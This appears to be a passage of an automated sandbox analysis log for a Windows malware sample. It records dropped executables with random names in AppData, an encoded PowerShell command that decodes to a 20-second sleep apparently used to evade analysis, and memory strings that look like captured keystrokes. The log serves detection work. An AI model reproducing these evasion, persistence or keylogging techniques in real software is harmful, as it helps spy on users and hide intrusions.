Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Jump to behavior
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000004.00000002.618527573.0000000002D15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r
Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
